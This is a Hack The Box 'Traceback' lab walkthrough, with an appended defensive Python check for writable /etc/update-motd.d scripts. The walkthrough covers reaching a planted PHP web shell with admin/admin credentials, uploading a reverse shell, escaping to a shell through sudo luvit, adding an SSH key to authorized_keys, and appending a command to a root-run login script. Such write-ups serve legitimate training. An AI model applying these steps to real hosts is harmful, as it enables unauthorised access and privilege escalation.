HTB::Traceback Walkthrough

 


  • nmap
  • pspy
  • gtfobins
  • OSINT
  • SSH with public key
0x03 Pentesting
nmap -sC -sV -oN nmap.txt 10.10.10.181
Getting User Access
80 HTTP Website

Hint: Some of the best web shells that you might need ;), Google it

Try each web shell filename as a URL path on the site.

The smevk.php web shell is present; the username is admin and the password is admin.


Upload a PHP reverse shell script through the web shell's Code Injector module.

$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
$ echo 'os.execute("/bin/sh")' > privesc.lua
$ cat privesc.lua
os.execute("/bin/sh")
$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode

$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$ cd /home/sysadmin
$ ls
luvit
user.txt
Get the user flag.
Getting Root Access

Add your own SSH public key to /home/sysadmin/.ssh/authorized_keys:

$ echo "<your SSH public key>" >> /home/sysadmin/.ssh/authorized_keys

$ cd /etc/update-motd.d/
$ echo "cat /root/root.txt" >> 00-header

$ ssh -i id_rsa sysadmin@10.10.10.181

The scripts in /etc/update-motd.d/ run as root at login, so the appended command prints the root flag.
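
The step above works because the sysadmin account can append to a script that runs as root at login. A defender-side check for that condition, added here as an example (not part of the original walkthrough): it flags entries in a script directory such as /etc/update-motd.d that are not owned by the trusted user or are writable by group or others. The function name `audit_script_dir` is hypothetical.

```python
import os
import stat


def audit_script_dir(path, trusted_uid=0):
    """Return (entry, reason) findings for `path` and the files in it that
    someone other than `trusted_uid` could modify.

    Hypothetical helper written for this example, not a standard tool.
    """
    findings = []
    # Check the directory itself too: write access to it allows replacing files.
    entries = [path] + sorted(os.path.join(path, n) for n in os.listdir(path))
    for entry in entries:
        st = os.lstat(entry)
        if stat.S_ISLNK(st.st_mode):
            # A symlink can point at a file outside the audited directory.
            findings.append((entry, "symlink"))
            continue
        if st.st_uid != trusted_uid:
            findings.append((entry, f"owned by uid {st.st_uid}"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((entry, f"group-writable (gid {st.st_gid})"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((entry, "world-writable"))
    return findings


if __name__ == "__main__":
    # Scripts here are executed as root on login, so every finding matters.
    for entry, reason in audit_script_dir("/etc/update-motd.d"):
        print(f"{entry}: {reason}")
```

Any finding on a file in this directory means a non-root account can change what root executes at the next login.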

